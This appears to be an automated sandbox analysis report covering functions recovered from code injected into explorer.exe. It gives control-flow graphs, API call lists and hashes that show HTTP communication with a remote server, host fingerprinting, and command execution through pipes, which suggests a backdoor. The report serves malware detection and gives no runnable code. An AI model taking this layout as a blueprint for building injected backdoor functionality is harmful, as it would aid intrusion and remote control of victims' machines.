                                                                                                                                                                                                                                                                      control_flow_graph 179 305a8e0-305a8fb call 3058cf0 182 305a904-305a918 call 305b4cc 179->182 183 305a8fd-305a8ff 179->183 187 305a926-305a92b 182->187 188 305a91a-305a924 182->188 184 305aa04-305aa0b 183->184 189 305a930-305a941 call 305bf78 187->189 188->189 192 305a943-305a945 189->192 193 305a94a-305a983 call 305b470 FindFirstFileW 189->193 192->184 196 305a9f5-305a9ff call 30582b4 193->196 197 305a985-305a98a 193->197 196->184 197->196 199 305a98c-305a9a1 FindNextFileW 197->199 200 305a9a5-305a9ab 199->200 201 305a9a3 199->201 203 305a9ad 200->203 204 305a9af-305a9dc call 305c144 call 3057430 200->204 201->196 203->196 209 305a9f3 204->209 210 305a9de-305a9f1 LoadLibraryW 204->210 209->197 210->196
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: DirectorySystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2188284642-0
                                                                                                                                                                                                                                                                      • Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                                                                                                      • Instruction ID: f05534c3a5404166811efa79761d3442754b24a7cbf4e342d5fc8b02e821d1ef
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B831102221AA91D6DB61DB24E48435FB3A4F7C4364F500726FAEE86AA8DF3CC545CB00
                                                                                                                                                                                                                                                                      Function 0305B388 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 221 305b388-305b3c6 NtAllocateVirtualMemory 222 305b3d7-305b3e0 221->222 223 305b3c8-305b3d2 call 305b470 221->223 223->222
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 2167126740-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                                                                                                      • Instruction ID: 0481be34d49ee6dd273ac2a819a78d201c49a6cc1f12eaf976defbdbec59482f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57E015A6229A8482D7109F24E45474BB760F7847B8F801301BAA90ABD8CBBCC108CF00
                                                                                                                                                                                                                                                                      Function 03055078 Relevance: 1.6, APIs: 1, Instructions: 57filenetworkCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 243 3055078-30550ba 244 30550bc-30550dc InternetReadFile 243->244 245 305514f 244->245 246 30550de-30550e3 244->246 247 3055154-305515c 245->247 246->245 248 30550e5-3055102 call 305b704 246->248 251 3055104-3055106 248->251 252 3055108-305514a call 305b3e4 248->252 251->247 252->244
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                                                                      • Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                                                                                                      • Instruction ID: e4d46b57cc763cfc05d8e10b255ffaac4f781d997a41f7cfc3b5b9165a27e8c7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1721E8363296859BDB60CA19E45479AB7E5F3CCB84F804125EA8E83B58EB7DC644CF04
                                                                                                                                                                                                                                                                      Function 030582B4 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 259 30582b4-30582cc 260 30582ef-30582f3 259->260 261 30582ce-30582eb NtFreeVirtualMemory 259->261 261->260
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeMemoryVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3963845541-0
                                                                                                                                                                                                                                                                      • Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                                                                                                      • Instruction ID: 4bc0fa2586770e22982b23dddcd1680671003f5393507fc27f231c57ffece3ac
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57E0EC72608A8182D7619B64E40438ABB64F3853B8F944305EAF816AE8CF7CC299CB04
                                                                                                                                                                                                                                                                      Function 0305C704 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 262 305c704-305c730 NtDelayExecution
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: DelayExecution
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1249177460-0
                                                                                                                                                                                                                                                                      • Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                                                                                                      • Instruction ID: 4f21d4ea45469e53f0ae5f3949b49ab8f7581cce462089660bcfe93428fbb235
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CD0C77260968087CB155B18E44520E7764F795344FD04519E68D45758DE3CC265CF04
                                                                                                                                                                                                                                                                      Function 030541B4 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                                                                                                                                      • Instruction ID: 723406f8bd212960b5d86c33c395655c7c9730bdd40df6f7abc75b534c1a57fa
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D831813521BB41C2E750DB76E8503AB72A8FB90365F801625FD6A466E4DF78C184CB04
                                                                                                                                                                                                                                                                      Function 03055160 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 107 3055160-30551c7 call 305b388 call 305b4cc 112 30551c9-30551d6 107->112 113 30551d8-30551e0 107->113 114 30551e5-305520d call 305be64 112->114 113->114 117 3055265-3055275 114->117 118 305520f-3055226 call 305b4cc 114->118 119 3055284-305528c 117->119 120 3055277-3055280 117->120 127 3055237-305523f 118->127 128 3055228-3055235 118->128 122 3055315-305532c call 305b4cc 119->122 123 3055292-30552a9 call 305b4cc 119->123 120->119 135 3055340-3055348 122->135 136 305532e-305533e 122->136 133 30552ab-30552b8 123->133 134 30552ba-30552c2 123->134 131 3055244-3055260 call 305be64 * 2 127->131 128->131 131->117 139 30552c7-3055310 HttpOpenRequestA 133->139 134->139 137 3055350-3055397 HttpOpenRequestA 135->137 136->137 140 305539c-30553a2 137->140 139->140 142 30553a4 140->142 143 30553a9-30553b1 140->143 144 3055467-305546d 142->144 145 30553d6-30553de 143->145 146 30553b3-30553d0 InternetSetOptionA 143->146 147 305546f-3055474 call 30582b4 144->147 148 3055479 144->148 149 3055424-305543f HttpSendRequestA 145->149 150 30553e0-3055422 call 305c0fc * 2 HttpSendRequestA 145->150 146->145 147->148 152 305547b-3055482 148->152 154 3055443-3055448 149->154 150->154 156 305544c-305545b call 30582b4 154->156 157 305544a 154->157 156->152 157->144
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET ref: 03055305
                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET ref: 03055391
                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET ref: 030553D0
                                                                                                                                                                                                                                                                      • HttpSendRequestA.WININET ref: 03055418
                                                                                                                                                                                                                                                                      • HttpSendRequestA.WININET ref: 03055439
                                                                                                                                                                                                                                                                        • Part of subcall function 030582B4: NtFreeVirtualMemory.NTDLL ref: 030582E5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2140924187-0
                                                                                                                                                                                                                                                                      • Opcode ID: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                                                                                                                                      • Instruction ID: 2d0498431418cbaf7cf30c3f29809077ce04a14962f043e323426f5f9ba417f1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A71D27620AB8486EB61DB14F49439BB7A4F3C9784F540126EACE46A68DFBCC584CF40
                                                                                                                                                                                                                                                                      Function 03058D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 174 3058d3c-3058d6c call 305b470 GetUserNameA 177 3058d87-3058d95 174->177 178 3058d6e-3058d81 wsprintfA 174->178 178->177
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameUserwsprintf
                                                                                                                                                                                                                                                                      • String ID: alfons
                                                                                                                                                                                                                                                                      • API String ID: 54179028-1092396413
                                                                                                                                                                                                                                                                      • Opcode ID: 74120f94081957b39dcb7d11c364901f8914ee27a4b2dd0b4ec9089b68c6a037
                                                                                                                                                                                                                                                                      • Instruction ID: db3b136511aae1936006a075d9f4e03cc77939200ce2e3cf13e90341c6b84d6a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74120f94081957b39dcb7d11c364901f8914ee27a4b2dd0b4ec9089b68c6a037
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDF0ED71226A87D2EB61DF10E8603AB6324FB90748FC05026A14D879A8EF3CC71ACB40
                                                                                                                                                                                                                                                                      Function 03058C30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 211 3058c30-3058c7b call 305b470 * 2 FindFirstVolumeW 216 3058c81-3058cd8 GetVolumeInformationW FindVolumeClose 211->216 217 3058c7d-3058c7f 211->217 219 3058ce3 216->219 220 3058cda-3058ce1 216->220 218 3058ce5-3058cec 217->218 219->218 220->218
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FindFirstVolumeW.KERNEL32 ref: 03058C6A
                                                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32 ref: 03058CBE
                                                                                                                                                                                                                                                                      • FindVolumeClose.KERNEL32 ref: 03058CCD
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 586543143-0
                                                                                                                                                                                                                                                                      • Opcode ID: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                                                                                                                                      • Instruction ID: 145a40ff7a6d50ee726e0b8c065fa48129f96e02bf9119840b87b23aba913229
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09113D7221AB40C6D761DB10F49439BB7A8F7C4350F904626E6D942AA8DF7CC649CB40
                                                                                                                                                                                                                                                                      Function 03058A58 Relevance: 1.6, APIs: 1, Instructions: 94libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 225 3058a58-3058a70 226 3058a72-3058a74 225->226 227 3058a79-3058acc 225->227 228 3058bd4-3058bd8 226->228 229 3058ad8-3058ae4 227->229 230 3058bd2 229->230 231 3058aea-3058b41 call 305c0fc call 3057430 229->231 230->228 236 3058b47-3058b4d 231->236 237 3058bcd 231->237 236->237 238 3058b4f-3058b57 236->238 237->229 238->237 240 3058b59-3058b61 238->240 241 3058b75-3058bcb 240->241 242 3058b63-3058b73 GetProcAddress GetProcAddressForCaller 240->242 241->228 242->241
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 190572456-0
                                                                                                                                                                                                                                                                      • Opcode ID: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                                                                                                                                      • Instruction ID: 3eb2e8abf8524f152ee5f4d11855936bd3f7e452aaa282550c2dfef1b7068af6
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6541997661AA4487DBA0CB19E49032AB7A4F7C8B94F544526FBCE83B28DB3CD551CF00
                                                                                                                                                                                                                                                                      Function 03056C6C Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 255 3056c6c-3056ca1 CreateThread 256 3056ca3-3056ca8 255->256 257 3056caa 255->257 258 3056cac-3056cb0 256->258 257->258
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                      • Opcode ID: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                                                                                                                                      • Instruction ID: bcc9759a7f141c845ff4ab5f371bdce0d966e1b4f3dbe4518664a7fb7ec7c504
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E04F72629B8485D7A4DB60F89535B6BA4F3C4394F846415F58B46B28CF3DC295CB00

                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                      Function 03052164 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32 ref: 03052233
                                                                                                                                                                                                                                                                      • SetHandleInformation.KERNEL32 ref: 0305224D
                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32 ref: 0305226E
                                                                                                                                                                                                                                                                      • SetHandleInformation.KERNEL32 ref: 03052288
                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32 ref: 030522A9
                                                                                                                                                                                                                                                                      • SetHandleInformation.KERNEL32 ref: 030522C3
                                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32 ref: 03052385
                                                                                                                                                                                                                                                                        • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 03052434
                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32 ref: 03052490
                                                                                                                                                                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 030524E4
                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32 ref: 03052540
                                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32 ref: 03052579
                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32 ref: 030525AA
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 030525B8
                                                                                                                                                                                                                                                                        • Part of subcall function 0305C704: NtDelayExecution.NTDLL ref: 0305C726
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 030525C6
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 030525D4
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 030525E2
                                                                                                                                                                                                                                                                        • Part of subcall function 030582B4: NtFreeVirtualMemory.NTDLL ref: 030582E5
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                                                                                                                                                      • String ID: h
                                                                                                                                                                                                                                                                      • API String ID: 30365702-2439710439
                                                                                                                                                                                                                                                                      • Opcode ID: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                                                                                                                                                      • Instruction ID: 99594ce897f2ace97b3e61e1fa68d7729ec36c49885b2c94778994ca6f824758
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1524f5b28a2edb6cb4b23f8a254870fd250a8d12787243c2afd0398788242095
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49C1CD76209BC08AE760CF65F49439BB7A5F7C8744F408526EA8987A68DFBCC548CF40
                                                                                                                                                                                                                                                                      Function 030580B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateFileInitStringUnicode
                                                                                                                                                                                                                                                                      • String ID: 0$@
                                                                                                                                                                                                                                                                      • API String ID: 2498367268-1545510068
                                                                                                                                                                                                                                                                      • Opcode ID: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                                                                                                                                                      • Instruction ID: 58336d17e4e2c813db4cf473c72d8dc0ca287d991f067c9a88ed8398bae42984
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E21AF721197848AE760DF14F45478BBBA4F3C4398F90821AE6D947AA8CB7DD589CF40
                                                                                                                                                                                                                                                                      Function 03052B28 Relevance: 6.1, APIs: 4, Instructions: 112fileCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32 ref: 03052BE7
                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 03052CAD
                                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32 ref: 03052CDA
                                                                                                                                                                                                                                                                      • FindClose.KERNEL32 ref: 03052CED
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 65906682-0
                                                                                                                                                                                                                                                                      • Opcode ID: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                                                                                                                                                      • Instruction ID: 9282651d19e14df35d4b30281c93f79c518676dff324dc8e93a0f5d917772338
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF514F3221AB8591DB60DB00F49039FB769FBC4344F844925FACE47A68EF78D645CB40
                                                                                                                                                                                                                                                                      Function 0305891C Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Version
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                      • Opcode ID: 3b2eb498cd8b652199b58d72c6b67949bfdd49cd34e56e752f0e54b4f45b47f9
                                                                                                                                                                                                                                                                      • Instruction ID: 9633e75301e19ee84b790bf5fbe10de38fc7042378ef09880cdd2eec69e704cd
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b2eb498cd8b652199b58d72c6b67949bfdd49cd34e56e752f0e54b4f45b47f9
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B931AE7162B680CBEBB0CB00E49832BB6A4F385759F48A55AFEC605958C77CC5C8CF06
                                                                                                                                                                                                                                                                      Function 0305C860 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
